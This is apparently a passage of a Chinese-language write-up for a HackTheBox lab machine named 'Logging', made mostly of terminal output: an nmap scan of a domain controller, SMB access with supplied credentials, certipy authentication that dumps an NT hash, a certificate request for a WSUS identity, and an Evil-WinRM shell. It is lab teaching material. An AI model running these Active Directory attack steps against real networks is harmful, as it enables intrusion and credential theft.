┌──(kali👻Thr2on1)-[~/Websec/HTB/Logging] └─$ sudo nmap -T4 -sV 10.129.35.131 Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-04 21:21 PDT Nmap scan report for wsus.logging.htb (10.129.35.131) Host is up (0.22s latency). Not shown: 987 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-05 11:22:09Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: logging.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: logging.htb0., Site: Default-First-Site-Name) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: logging.htb0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: logging.htb0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 58.08 seconds
domain:logging.htb DC:DC01.logging.htb
SMB
给出了初始凭证,可以跑一下SMB、LDAP服务 在Logs共享目录下可以找到四个日志文件
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali👻Thr2on1)-[~/Websec/HTB/Logging] └─$ smbclient -U 'wallace.everette%Welcome2026@' //10.129.35.131/Logs Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Apr 16 16:10:09 2026 .. D 0 Thu Apr 16 16:10:09 2026 Audit_Heartbeat.log A 1294 Thu Apr 16 16:10:09 2026 IdentitySync_Trace_20260219.log A 8488 Thu Apr 16 16:10:09 2026 Service_State.log A 468 Thu Apr 16 16:10:09 2026 TaskMonitor.log A 1170 Thu Apr 16 16:10:09 2026
6657279 blocks of size 4096. 2027009 blocks available smb: \>
┌──(kali👻Thr2on1)-[~/Websec/HTB/Logging] └─$ certipy auth -pfx jaylee.pfx -password123456-dc-ip10.129.35.131 Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities: [*] SAN UPN: 'jaylee.clifton@logging.htb' [*] Security Extension SID: 'S-1-5-21-4020823815-2796529489-1682170552-2105' [*] Using principal: 'jaylee.clifton@logging.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'jaylee.clifton.ccache' File 'jaylee.clifton.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y [*] Wrote credential cache to 'jaylee.clifton.ccache' [*] Trying to retrieve NT hash for'jaylee.clifton' [*] Got hash for'jaylee.clifton@logging.htb': aad3b435b51404eeaad3b435b51404ee:1abff5519c569c11dc713706b4a15ae0
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail [*] Requesting certificate via RPC [*] Request ID is 15 [*] Successfully requested certificate [*] Got certificate with multiple identities UPN: 'wsus.logging.htb' DNS Host Name: 'wsus.logging.htb' [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'wsus.logging.htb_wsus.pfx' [*] Wrote certificate and private key to 'wsus.logging.htb_wsus.pfx'
*Evil-WinRM* PS C:\Users\msa_health$\Documents> net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain